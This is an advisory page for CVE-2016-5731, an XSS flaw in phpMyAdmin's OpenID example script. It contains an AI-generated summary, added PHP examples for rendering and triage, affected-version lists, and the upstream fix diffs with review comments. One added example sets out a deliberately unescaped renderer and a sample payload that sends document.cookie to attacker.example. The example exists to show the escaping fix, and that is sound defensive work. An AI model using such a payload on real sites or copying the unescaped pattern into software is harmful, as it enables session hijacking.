VYPR
Medium severity, score 6.1 · NVD Advisory · Published Jul 3, 2016 · Updated May 6, 2026

CVE-2016-5731

Description

Cross-site scripting (XSS) vulnerability in examples/openid.php in phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before 4.6.3 allows remote attackers to inject arbitrary web script or HTML via vectors involving an OpenID error message.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Cross-site scripting (XSS) vulnerability in phpMyAdmin's OpenID example script allows remote attackers to inject arbitrary web script or HTML via crafted OpenID error messages.

Vulnerability

A cross-site scripting (XSS) vulnerability exists in examples/openid.php, the example OpenID signon script shipped with phpMyAdmin. When the bundled OpenID relying-party code throws, the script concatenates the exception's message straight into a <pre> element without HTML escaping, so any markup carried in that message is rendered by the visiting browser. This affects phpMyAdmin versions 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before 4.6.3 [1][3].

Exploitation

The vulnerable output sits on the error path: an attacker feeds the example script OpenID input that makes the relying-party library throw, and the resulting error message, which reflects parts of that input, is echoed unescaped into the page. The attack requires the PHP setting html_errors to be Off in php.ini [3]. No authentication is needed; the attacker only needs to get a user to open a crafted URL for, or otherwise interact with, the example script.
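The unescaped concatenation described above, beside the htmlspecialchars() form the patches introduce, as an added example written for this page; it is not phpMyAdmin's own code. The function names, the attacker.example host and the exception message text are constructed for illustration, and the explicit ENT_QUOTES | ENT_SUBSTITUTE flags with a pinned 'UTF-8' charset go beyond what the patch itself passes. Written for PHP 7 or later.

```php
<?php
// Added example (not phpMyAdmin code): contrasts the unescaped error
// rendering that CVE-2016-5731 describes with the htmlspecialchars() form
// the patches introduce. The payload below is constructed for illustration.

/**
 * Pre-fix behaviour: the exception message is concatenated straight into
 * the <pre> element, so any markup inside the message becomes live HTML.
 */
function render_error_unsafe(Exception $e): string
{
    $contents  = "<div class='relyingparty_results'>\n";
    $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
    $contents .= "</div>";
    return $contents;
}

/**
 * Post-fix behaviour. The explicit flags are an addition to what the patch
 * uses: ENT_QUOTES also encodes quotes, ENT_SUBSTITUTE replaces invalid
 * UTF-8 instead of returning an empty string, and the charset is pinned so
 * the result does not depend on the PHP version's default.
 */
function render_error_safe(Exception $e): string
{
    $escaped   = htmlspecialchars($e->getMessage(), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $contents  = "<div class='relyingparty_results'>\n";
    $contents .= "<pre>" . $escaped . "</pre>\n";
    $contents .= "</div>";
    return $contents;
}

/** True when the rendered HTML still contains a raw <script> start tag. */
function contains_live_script(string $html): bool
{
    return (bool) preg_match('/<script\b/i', $html);
}

// Constructed message standing in for what an OpenID library might place in
// an exception when fed hostile input; the exact text is hypothetical.
$payload = "OpenID error: </pre><script>document.location='https://attacker.example/?c='+document.cookie</script><pre>";
$e = new Exception($payload);

$unsafe = render_error_unsafe($e);
$safe   = render_error_safe($e);

// The unsafe rendering closes the <pre> and drops a live script element;
// the safe rendering shows the same bytes as inert text.
assert(contains_live_script($unsafe) === true);
assert(contains_live_script($safe) === false);
assert(strpos($safe, '&lt;script&gt;') !== false);

echo $unsafe, "\n---\n", $safe, "\n";
```

The position being protected is element content inside <pre>, where &, < and > are the characters that can break out; ENT_QUOTES is not strictly needed there, but using it everywhere avoids having to re-check the context each time an error renderer is copied into an attribute.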

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser, leading to potential information disclosure, session hijacking, or other client-side attacks. The impact is limited to the user's session and does not directly compromise the server [1][3]. Because the example script is served from the phpMyAdmin document root, the injected script runs in the same origin as phpMyAdmin itself, so an authenticated administrator's session is the realistic target.

Mitigation

Upgrade to phpMyAdmin 4.6.3, 4.4.15.7, or 4.0.10.16 or later [3]. Alternatively, set html_errors = On in php.ini, or delete the ./examples/openid.php file entirely [3]. Note that the example script is reachable by URL whenever it is present under the web root (unless the web server blocks the examples directory), whether or not the deployment uses OpenID signon; "not used" therefore only counts as a mitigation when the file has actually been removed, in which case nothing further is needed.
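A triage helper for the three mitigations listed above, as an added example written for this page (not phpMyAdmin's code): it checks an installed version against the advisory's ranges with version_compare(), whether the example file is still present under a hypothetical install path, and whether html_errors is On. The function names, the /var/www/phpmyadmin path and the sample version strings are assumptions; the version ranges are the ones in this advisory. Written for PHP 7.1 or later.

```php
<?php
// Added example (not phpMyAdmin code): triage helpers for the mitigation
// options in the advisory. Version ranges are the advisory's; the install
// path and the ini lookup are assumptions about a typical deployment.

/** Affected branches from the advisory: branch prefix => first fixed version. */
const CVE_2016_5731_FIXED = [
    '4.0' => '4.0.10.16',
    '4.4' => '4.4.15.7',
    '4.6' => '4.6.3',
];

/**
 * True when $version falls inside one of the affected ranges.
 * Branches the advisory does not list (4.5.x, 4.7 and later) are treated
 * as not affected, which is what the affected-version list implies.
 */
function pma_version_affected(string $version): bool
{
    foreach (CVE_2016_5731_FIXED as $branch => $fixed) {
        if (strpos($version, $branch . '.') === 0) {
            // version_compare() handles four-part versions and
            // pre-release suffixes such as 4.6.0alpha1.
            return version_compare($version, $fixed, '<');
        }
    }
    return false;
}

/**
 * Status of the three mitigations for one deployment. $docroot is a
 * hypothetical install path; $html_errors is the php.ini value and defaults
 * to the running process's own setting.
 */
function pma_openid_mitigations(string $version, string $docroot, ?string $html_errors = null): array
{
    $example = rtrim($docroot, '/') . '/examples/openid.php';
    if ($html_errors === null) {
        $html_errors = (string) ini_get('html_errors');
    }
    return [
        'patched_version' => !pma_version_affected($version),
        'example_removed' => !file_exists($example),
        'html_errors_on'  => in_array(strtolower($html_errors), ['1', 'on', 'true'], true),
    ];
}

/** Exposed only when none of the three mitigations applies. */
function pma_openid_exposed(array $status): bool
{
    return !$status['patched_version']
        && !$status['example_removed']
        && !$status['html_errors_on'];
}

// Constructed inputs: the path is hypothetical and does not exist here.
assert(pma_version_affected('4.6.2') === true);
assert(pma_version_affected('4.6.3') === false);
assert(pma_version_affected('4.0.10.15') === true);
assert(pma_version_affected('4.0.10.16') === false);
assert(pma_version_affected('4.4.15') === true);
assert(pma_version_affected('4.5.0') === false);

$status = pma_openid_mitigations('4.6.2', '/var/www/phpmyadmin', 'Off');
assert($status['patched_version'] === false);
assert($status['html_errors_on'] === false);

echo pma_openid_exposed($status) ? "exposed\n" : "mitigated\n";
```

Run it with the real install path and the html_errors value from the web server's php.ini (not the CLI's, which may differ) to get a meaningful answer for a deployment.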

AI Insight generated on May 23, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                            Affected versions        Patched version
phpmyadmin/phpmyadmin (Packagist)  >= 4.0, < 4.0.10.16      4.0.10.16
phpmyadmin/phpmyadmin (Packagist)  >= 4.4, < 4.4.15.7       4.4.15.7
phpmyadmin/phpmyadmin (Packagist)  >= 4.6, < 4.6.3          4.6.3

Affected products (65)

  • phpMyAdmin (cpe:2.3:a:phpmyadmin:phpmyadmin), 60 entries:
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.10:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.11:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.12:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.13:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.14:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.15:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.2:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.3:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.4:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.5:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.6:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.7:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.8:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.9:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.2:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.3:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.2:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.5:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.6:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.7:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.8:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.9:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.0:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.10:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.1.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.11:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.12:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.13:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.13.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.14.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.2:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.3:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.4:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.5:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.6:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.2:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.3:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.4:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.5:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.6:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.6.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.7:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.8:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.9:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.0:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.0:alpha1:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.0:rc1:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.0:rc2:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.2:*:*:*:*:*:*:*
    • (no CPE) range: 4.0.x < 4.0.10.16, 4.4.x < 4.4.15.7, 4.6.x < 4.6.3
  • cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*
  • openSUSE (cpe:2.3:o:opensuse:opensuse), 2 entries:
    • cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*
    • cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*
  • GHSA version ranges (no CPE), 2 entries:
    • >= 4.0, < 4.0.10.16
    • < 4.6.5.2-1.1

Patches (6)
78f6c54

Add error handling to constructing openid message

https://github.com/phpmyadmin/phpmyadmin · Michal Čihař · Jun 17, 2016 · via GHSA
1 file changed: examples/openid.php (modified, +17 -11)
    @@ -61,6 +61,16 @@ function show_page($contents)
     <?php
     }
     
    +function die_error($e)
    +{
    +    $contents = "<div class='relyingparty_results'>\n";
    +    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
    +    $contents .= "</div class='relyingparty_results'>";
    +    show_page($contents);
    +    exit;
    +}
    +
    +
     /* Need to have cookie visible from parent directory */
     session_set_cookie_params(0, '/', '', 0);
     /* Create signon session */
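Review bot: `$contents .= "</div class='relyingparty_results'>";` in the new die_error() puts an attribute on a closing tag, which is not valid HTML; since the helper is being introduced anyway, emit a plain `</div>` here. A one-line docblock stating that die_error() never returns (it calls exit) would also help, because the call sites added below continue straight on to use `$o`, `$authRequest` and `$message` as if the catch could fall through.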
    @@ -108,23 +118,15 @@ function show_page($contents)
     try {
         $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
     } catch (Exception $e) {
    -    $contents = "<div class='relyingparty_results'>\n";
    -    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
    -    $contents .= "</div class='relyingparty_results'>";
    -    show_page($contents);
    -    exit;
    +    die_error($e);
     }
     
     /* Redirect to OpenID provider */
     if (isset($_POST['start'])) {
         try {
             $authRequest = $o->prepare();
         } catch (Exception $e) {
    -        $contents = "<div class='relyingparty_results'>\n";
    -        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
    -        $contents .= "</div class='relyingparty_results'>";
    -        show_page($contents);
    -        exit;
    +        die_error($e);
         }
     
         $url = $authRequest->getAuthorizeURL();
    @@ -141,7 +143,11 @@ function show_page($contents)
         }
     
         /* Check reply */
    -    $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
    +    try {
    +        $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
    +    } catch (Exception $e) {
    +        die_error($e);
    +    }
     
         $id = $message->get('openid.claimed_id');
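Review bot: correctness of this hunk hinges on die_error() exiting: if it ever stopped doing so, `$message` would be undefined on the next line and `$message->get('openid.claimed_id')` would fault on exactly the input that just failed to parse. The `$queryString` being turned into an OpenID_Message is the untrusted half of the exchange, so either add `return;` after `die_error($e);` or document the helper as non-returning so the invariant is explicit at the call site.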
     
    
d005ba6

Add error handling to constructing openid message

https://github.com/phpmyadmin/phpmyadmin · Michal Čihař · Jun 17, 2016 · via GHSA
1 file changed: examples/openid.php (modified, +17 -11)
    @@ -63,6 +63,16 @@ function Show_page($contents)
         <?php
     }
     
    +function Die_error($e)
    +{
    +    $contents = "<div class='relyingparty_results'>\n";
    +    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
    +    $contents .= "</div class='relyingparty_results'>";
    +    Show_page($contents);
    +    exit;
    +}
    +
    +
     /* Need to have cookie visible from parent directory */
     session_set_cookie_params(0, '/', '', false);
     /* Create signon session */
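Review bot: this branch introduces the helper as `Die_error()` next to `Show_page()`, while the same change in 78f6c54 uses `die_error()` and `show_page()`. PHP resolves function names case-insensitively so both spellings run, but the divergence means the three backports of this fix cannot be cherry-picked cleanly between branches; pick one spelling for the new helper everywhere, even where the surrounding file keeps its capitalised Show_page().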
    @@ -110,23 +120,15 @@ function Show_page($contents)
     try {
         $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
     } catch (Exception $e) {
    -    $contents = "<div class='relyingparty_results'>\n";
    -    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
    -    $contents .= "</div class='relyingparty_results'>";
    -    Show_page($contents);
    -    exit;
    +    Die_error($e);
     }
     
     /* Redirect to OpenID provider */
     if (isset($_POST['start'])) {
         try {
             $authRequest = $o->prepare();
         } catch (Exception $e) {
    -        $contents = "<div class='relyingparty_results'>\n";
    -        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
    -        $contents .= "</div class='relyingparty_results'>";
    -        Show_page($contents);
    -        exit;
    +        Die_error($e);
         }
     
         $url = $authRequest->getAuthorizeURL();
    @@ -143,7 +145,11 @@ function Show_page($contents)
         }
     
         /* Check reply */
    -    $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
    +    try {
    +        $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
    +    } catch (Exception $e) {
    +        Die_error($e);
    +    }
     
         $id = $message->get('openid.claimed_id');
     
    
418aeea3d83b

Add error handling to constructing openid message

https://github.com/phpmyadmin/phpmyadmin · Michal Čihař · Jun 17, 2016 · via GHSA
1 file changed: examples/openid.php (modified, +17 -11)
    @@ -63,6 +63,16 @@ function Show_page($contents)
         <?php
     }
     
    +function Die_error($e)
    +{
    +    $contents = "<div class='relyingparty_results'>\n";
    +    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
    +    $contents .= "</div class='relyingparty_results'>";
    +    Show_page($contents);
    +    exit;
    +}
    +
    +
     /* Need to have cookie visible from parent directory */
     session_set_cookie_params(0, '/', '', false);
     /* Create signon session */
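Review bot: `htmlspecialchars($e->getMessage())` in Die_error() relies on the default flags and charset, and both have changed across PHP releases (ENT_COMPAT was the default until PHP 8.1 made it ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401; the default charset moved from ISO-8859-1 to UTF-8 in 5.4). On a UTF-8 default, an invalid byte sequence in the message makes the function return an empty string, which silently hides the error. Passing `ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'` explicitly gives the same output on every supported PHP (ENT_SUBSTITUTE needs PHP 5.4 or later).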
    @@ -110,23 +120,15 @@ function Show_page($contents)
     try {
         $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
     } catch (Exception $e) {
    -    $contents = "<div class='relyingparty_results'>\n";
    -    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
    -    $contents .= "</div class='relyingparty_results'>";
    -    Show_page($contents);
    -    exit;
    +    Die_error($e);
     }
     
     /* Redirect to OpenID provider */
     if (isset($_POST['start'])) {
         try {
             $authRequest = $o->prepare();
         } catch (Exception $e) {
    -        $contents = "<div class='relyingparty_results'>\n";
    -        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
    -        $contents .= "</div class='relyingparty_results'>";
    -        Show_page($contents);
    -        exit;
    +        Die_error($e);
         }
     
         $url = $authRequest->getAuthorizeURL();
    @@ -143,7 +145,11 @@ function Show_page($contents)
         }
     
         /* Check reply */
    -    $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
    +    try {
    +        $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
    +    } catch (Exception $e) {
    +        Die_error($e);
    +    }
     
         $id = $message->get('openid.claimed_id');
     
    
94cf3864254f

Escape error messages from OpenID

https://github.com/phpmyadmin/phpmyadmin · Michal Čihař · Jun 17, 2016 · via GHSA
1 file changed: examples/openid.php (modified, +3 -3)
    @@ -111,7 +111,7 @@ function Show_page($contents)
         $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
     } catch (Exception $e) {
         $contents = "<div class='relyingparty_results'>\n";
    -    $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
    +    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
         $contents .= "</div class='relyingparty_results'>";
         Show_page($contents);
         exit;
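Review bot: this is the actual fix, and the escaping is sufficient for the position it protects (element content inside `<pre>`, where `&`, `<` and `>` are the characters that can break out), but it is applied by hand at one site; the same five lines appear again in the next hunk, which is exactly how a third site gets missed. A small helper that escapes and renders would make the invariant "every error message goes through htmlspecialchars()" something a reviewer can check in one place.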
    @@ -121,9 +121,9 @@ function Show_page($contents)
     if (isset($_POST['start'])) {
         try {
             $authRequest = $o->prepare();
    -    } catch (OpenID_Exception $e) {
    +    } catch (Exception $e) {
             $contents = "<div class='relyingparty_results'>\n";
    -        $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
    +        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
             $contents .= "</div class='relyingparty_results'>";
             Show_page($contents);
             exit;
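Review bot: widening `catch (OpenID_Exception $e)` to `catch (Exception $e)` is a behaviour change beyond escaping: a non-OpenID exception thrown by `prepare()` previously propagated out of the script to PHP's default handler and is now rendered on this page instead. That is the right direction for output control, but it also means the message of any library or runtime exception is shown verbatim to an unauthenticated visitor; consider logging the full message server-side and rendering a fixed, generic string.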
    
52e7898

Escape error messages from OpenID

https://github.com/phpmyadmin/phpmyadmin · Michal Čihař · Jun 17, 2016 · via GHSA
1 file changed: examples/openid.php (modified, +3 -3)
    @@ -111,7 +111,7 @@ function Show_page($contents)
         $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
     } catch (Exception $e) {
         $contents = "<div class='relyingparty_results'>\n";
    -    $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
    +    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
         $contents .= "</div class='relyingparty_results'>";
         Show_page($contents);
         exit;
    @@ -121,9 +121,9 @@ function Show_page($contents)
     if (isset($_POST['start'])) {
         try {
             $authRequest = $o->prepare();
    -    } catch (OpenID_Exception $e) {
    +    } catch (Exception $e) {
             $contents = "<div class='relyingparty_results'>\n";
    -        $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
    +        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
             $contents .= "</div class='relyingparty_results'>";
             Show_page($contents);
             exit;
    
5fefa51

Escape error messages from OpenID

https://github.com/phpmyadmin/phpmyadmin · Michal Čihař · Jun 17, 2016 · via GHSA
1 file changed: examples/openid.php (modified, +3 -3)
    @@ -109,7 +109,7 @@ function show_page($contents)
         $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
     } catch (Exception $e) {
         $contents = "<div class='relyingparty_results'>\n";
    -    $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
    +    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
         $contents .= "</div class='relyingparty_results'>";
         show_page($contents);
         exit;
    @@ -119,9 +119,9 @@ function show_page($contents)
     if (isset($_POST['start'])) {
         try {
             $authRequest = $o->prepare();
    -    } catch (OpenID_Exception $e) {
    +    } catch (Exception $e) {
             $contents = "<div class='relyingparty_results'>\n";
    -        $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
    +        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
             $contents .= "</div class='relyingparty_results'>";
             show_page($contents);
             exit;
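Review bot: these two catch sites are now escaped, but the `new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP)` call further down the same file is not inside a try block in this commit; the companion commits listed above (78f6c54 and its branch siblings) add that wrapper as a separate change. Until both land on a branch, a parse failure on the return query string still leaves the script as an uncaught exception, so the two commits should ship together and the advisory's fixed versions should be read as including both.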
    

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (14)

News mentions (0): no linked articles in our index yet.